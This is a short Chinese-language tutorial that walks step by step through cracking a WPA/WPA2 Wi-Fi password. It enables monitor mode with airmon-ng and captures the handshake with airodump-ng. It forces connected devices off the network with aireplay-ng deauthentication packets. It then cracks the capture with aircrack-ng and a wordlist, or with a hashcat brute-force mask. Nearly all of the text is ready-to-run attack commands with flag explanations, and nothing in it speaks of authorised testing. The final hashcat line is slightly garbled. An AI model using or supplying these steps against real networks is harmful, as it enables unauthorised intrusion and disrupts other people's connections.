1. 确定使用的网络接口
sudo airmon-ng
2. 开启监听模式
airmon-ng start wlan0 执行完成后网卡接口编程wlan0mon
3. 查看网络状况
airodump-ng wlan0mon
4. 开始抓包
airodump-ng -c 6 --bssid ssid -w ~/ wlan0mon
- -c 指定频道
- –bssid 指定路由器bssid
- -w 保存数据的位置 由于路由器只是在重新链接是才会发送握手包,因此需要将以连接设备重新连接
5. 踢出设备
通过aireplay-ng的工具,它可以强制用户断开wifi连接;原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。
sudo aireplay-ng -0 2 -a ssid -c ssid wlan0mon
- -0表示发起deauthentication攻击
- -a指定无线路由器BSSID
- -c指定强制断开的设备
6. 停止监听模式
抓包成功后ctrl+C即可结束抓包。
airmon-ng stop wlan0mon
7. 跑包
aircrack-ng -a2 -b ssid -w dict.txt ~/*.cap
- -a2代表WPA的握手包
- -b指定要破解的wifi BSSID
- -w指定字典文件
- 最后是抓取的包
8. hashcat跑包
hashcat64.exe -m 2500 -a3 A8_handshake.cap.hccap ?d?d?d?d?d?d?d?dpause
- -m 2500:破解 WPA2 密码
- -a3:暴力破解 - A8_handshake.cap.hccap:握手包文件